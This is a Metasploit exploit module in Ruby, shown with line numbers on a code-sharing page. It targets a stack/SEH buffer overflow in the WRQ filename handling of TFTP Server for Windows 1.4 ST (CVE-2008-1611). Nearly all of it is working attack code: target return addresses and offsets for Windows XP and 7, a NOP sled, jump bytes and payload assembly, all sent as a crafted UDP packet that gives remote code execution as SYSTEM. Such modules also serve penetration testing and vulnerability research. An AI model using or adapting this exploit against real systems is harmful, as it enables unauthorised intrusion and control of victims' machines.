Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8
  include Msf::Exploit::Remote::Udp
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'            => 'TFTP Server for Windows 1.4 ST WRQ Buffer Overflow',
13
      'Description'     => %q{
14
          This module exploits a vulnerability found in TFTP Server 1.4 ST.  The flaw
15
        is due to the way TFTP handles the filename parameter extracted from a WRQ request.
16
        The server will append the user-supplied filename to TFTP server binary's path
17
        without any bounds checking, and then attempt to check this path with a fopen().
18
        Since this isn't a valid file path, fopen() returns null, which allows the
19
        corrupted data to be used in a strcmp() function, causing an access violation.
20

21
        Since the offset is sensitive to how the TFTP server is launched, you must know
22
        in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'
23
        , and then manually select your target accordingly. A successful attempt will lead
24
        to remote code execution under the context of SYSTEM if run as a service, or
25
        the user if run as a standalone. A failed attempt will result a denial-of-service.
26
      },
27
      'Author'          =>
28
        [
29
          'Mati Aharoni', #Initial discovery, PoC
30
          'Datacut'       #Metasploit
31
        ],
32
      'References'      =>
33
        [
34
          [ 'CVE', '2008-1611' ],
35
          [ 'OSVDB', '43785' ],
36
          [ 'BID', '18345' ],
37
          [ 'EDB', '5314' ]
38
        ],
39
      'DefaultOptions'  =>
40
        {
41
          'EXITFUNC' =>'seh',
42
        },
43
      'Payload'         =>
44
        {
45
          'Space'           => 600,
46
          'BadChars'        => "\x00\x2f",
47
          'StackAdjustment' => -3500
48
        },
49
      'Platform'        => 'win',
50
      'Targets'         =>
51
        [
52
          # datacut tested ok 19/04/12 on xp sp2 sp3, win 7 sp0 sp1.
53
          # possible may work for other service packs and or vista
54
          # Rets = P/P/R from tftpserversp.exe
55
          [ 'Windows XP SP2/SP3 EN Service Mode',       { 'Ret' => 0x416801 , 'Offset' => 1203} ],
56
          [ 'Windows XP SP2/SP3 EN Standalone Mode',    { 'Ret' => 0x416801 , 'Offset' => 1487} ],
57
          [ 'Windows 7 SP0/SP1 EN x64 Service Mode',    { 'Ret' => 0x416801 , 'Offset' => 1217} ],
58
          [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],
59
          [ 'Windows 7 SP0/SP1 EN x86 Service Mode',    { 'Ret' => 0x416801 , 'Offset' => 1223} ],
60
          [ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]
61
        ],
62
      'Privileged'	=> false,
63
      'DisclosureDate'=> '2008-03-26',
64
      'DefaultTarget' => 4))  #TFTP is installed as a service
65

66
    register_options(
67
      [
68
        Opt::RPORT(69)
69
      ])
70
  end
71

72

73
  def exploit
74
    connect_udp
75

76
    nops = make_nops(50)
77
    lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)
78
    near = "\xe9\x80\xfd\xff\xff"    #jump back 640 bytes to the nop sled
79
    nseh = "\xeb\xf9" + make_nops(2) #jump back 7 bytes to the long jump
80

81
    evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')
82
    mode = "netascii"
83

84
    #Send the WRQ packet (header "\x00\x02")
85
    sploit = "\x00\x02" + evil + "\0" + mode +"\0"
86

87
    udp_sock.put(sploit)
88

89
    handler
90
    disconnect_udp
91
  end
92
end
93

94